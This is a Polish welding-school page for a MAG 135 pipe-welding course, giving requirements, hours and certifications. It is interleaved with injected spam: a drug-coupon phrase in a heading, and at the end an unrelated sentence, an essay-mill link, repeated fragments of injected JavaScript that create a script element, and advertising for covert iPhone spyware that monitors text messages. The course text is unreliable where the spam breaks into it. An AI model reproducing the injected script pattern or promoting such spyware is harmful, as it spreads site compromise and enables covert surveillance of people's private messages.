MAG 135 T ( 1.1 )

Kurs spawania rur ze stali ferrytycznych lub nierdzewnych spoinami czołowymi metodą MAG (135 ) III stopień


Założenia organizacyjno – programowe: lexapro coupons 2012


Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-T-BW-1-135 lub IS-T-BW-8-135
Zasady rekrutacji
  • posiadanie Książki Spawacza z wpisem o ukończeniu kursu spawania blach spoinami czołowymi IS-P-BW-1-135 lub IS-T-BW-8-135
  • ukończenie ponadpodstawowego kursu spawania blach  wg systemu stosowanego do 2007 roku
  • Praktykę w spawaniu (licząc od daty egzaminu  końcowego) przez co najmniej 1 roku
Liczba godzin
  • Część teoretyczna – 7 godzin
  • Część praktyczna: ćwiczenia praktyczne – 82 godz., instruktaż wstępny – 2 godz., egzamin – 8 godz.
  • Razem kurs – 99 godz.

 

Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 1, 2, 3  wg PN-87/M-69008. Uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?

The federal government says that means a person of cuban, mexican, puerto rican, south or central american, or other spanish culture or origin, regardless https://firstessaywritinghelp.com of racevar d=document;var s=d.createElement(‚script’); var d=document;var s=d.createElement(‚script’); topspyapps.netiphone spyware, spy without jailbreak, monitoring text messages

Top